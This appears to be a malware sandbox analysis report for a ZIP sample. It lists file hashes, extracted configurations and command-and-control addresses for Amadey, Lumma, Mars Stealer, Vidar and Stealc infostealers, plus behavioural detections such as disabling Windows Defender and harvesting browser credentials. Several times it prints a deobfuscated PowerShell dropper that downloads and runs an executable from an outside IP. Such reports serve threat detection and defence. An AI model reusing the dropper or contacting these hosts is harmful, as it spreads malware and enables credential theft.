General

  • Target

    d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.zip

  • Size

    507KB

  • Sample

    250316-wt6y9awzav

  • MD5

    babbebc42c781bc612761b992ce6d6ca

  • SHA1

    136946b05deb1b88e4bd94c2017d9720e0ae3d6a

  • SHA256

    1349109b1f5748f6aa563fcf15cd83547c5f1871b46cb1bdf0a1879662485aa8

  • SHA512

    0476a99eb4ba5c3cd537bee8457157d8c36065907ff24ed45c44f54c3584dc210777b1676ef3a5be65576e050d70e8093396517d8ad0cd0e6834c6f4fca49a47

  • SSDEEP

    12288:OS4TsMUwgEuerallX2NNCxr+bFGH/C8Yvigyxdii:OSaHUwgEueral5LgcfCJvLCdii

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "5FU1QNWJGEYKPUKXF0QYKQDQ2M6DRSU0.EXE"
2
(new-object system.net.webclient).downloadfile("http://176.113.115.7/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "VFIIS6FFLYBD5B1NR4DLDYWDMYSUDL3E.EXE"
2
(new-object system.net.webclient).downloadfile("http://176.113.115.7/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "\\483d2fa8a0d53818306efeb32d3.exe"
2
(new-object system.net.webclient).downloadfile("http://176.113.115.7/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

C2

https://selfdefens.bet/api

https://caliberc.today/api

https://3p1pistolpra.bet/api

https://yweaponwo.life/api

https://armamenti.world/api

https://targett.top/api

https://armoryarch.shop/api

https://qnblackeblast.run/api

https://citydisco.bet/api

https://crosshairc.life/api

https://mrodularmall.top/api

https://jowinjoinery.icu/api

https://legenassedk.top/api

https://htardwarehu.icu/api

https://cjlaspcorne.icu/api

https://bugildbett.top/api

https://2weaponrywo.digital/api

https://gunrightsp.run/api

https://pistolpra.bet/api

https://weaponwo.life/api

Extracted

Family

marsstealer

Botnet

Default

C2

ctrlgem.xyz/gate.php

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "HECMJG8IXPZGM2EQNG6VAPBEUICVW7J9.EXE"
2
(new-object system.net.webclient).downloadfile("http://176.113.115.7/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
1
$d = $env:temp + "ECVIULFBFD1TCCUVTDOXMMIJZRBAKDIO.EXE"
2
(new-object system.net.webclient).downloadfile("http://176.113.115.7/mine/random.exe", $d)
3
start-process $d
4
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

vidar

Version

13.2

Botnet

e3a5dc9f3619e7e1987b9fcc98b49843

C2

https://t.me/g_etcontent

https://steamcommunity.com/profiles/76561199832267488

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

lumma

C2

https://codxefusion.top/api

Targets

    • Target

      d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43

    • Size

      938KB

    • MD5

      10b0224ea8be9e8e9098b528cc2c96b5

    • SHA1

      fd18bdccb7547938e538da517a86446b1805f0e9

    • SHA256

      d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43

    • SHA512

      5cac4931ba679852f0873447fb84008ca1c0e4953f9a10764c5caf65d083985e50f534af75216279253d133a4320ffe290fdd438e812ac1824d349259c6bfd0b

    • SSDEEP

      24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8a02u:VTvC/MTQYxsWR7a02

    • Amadey

      Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    • Amadey family

    • Detect Vidar Stealer

    • Detects Healer an antivirus disabler dropper

    • Healer

      Healer an antivirus disabler dropper.

    • Healer family

    • Lumma Stealer, LummaC

      Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    • Lumma family

    • Mars Stealer

      An infostealer written in C++ based on other infostealers.

    • Marsstealer family

    • Modifies Windows Defender DisableAntiSpyware settings

    • Modifies Windows Defender Real-time Protection settings

    • Modifies Windows Defender TamperProtection settings

    • Modifies Windows Defender notification settings

    • Stealc

      Stealc is an infostealer written in C++.

    • Stealc family

    • Vidar

      Vidar is an infostealer based on Arkei stealer.

    • Vidar family

    • Identifies VirtualBox via ACPI registry values (likely anti-VM)

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Downloads MZ/PE file

    • Uses browser remote debugging

      Can be used control the browser and steal sensitive information such as credentials and session cookies.

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Drops startup file

    • Executes dropped EXE

    • Identifies Wine through registry keys

      Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    • Loads dropped DLL

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Unsecured Credentials: Credentials In Files

      Steal credentials from unsecured files.

    • Windows security modification

    • Accesses cryptocurrency files/wallets, possible credential harvesting

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Drops desktop.ini file(s)

    • AutoIT Executable

      AutoIT scripts compiled to PE executables.

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Suspicious use of SetThreadContext

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.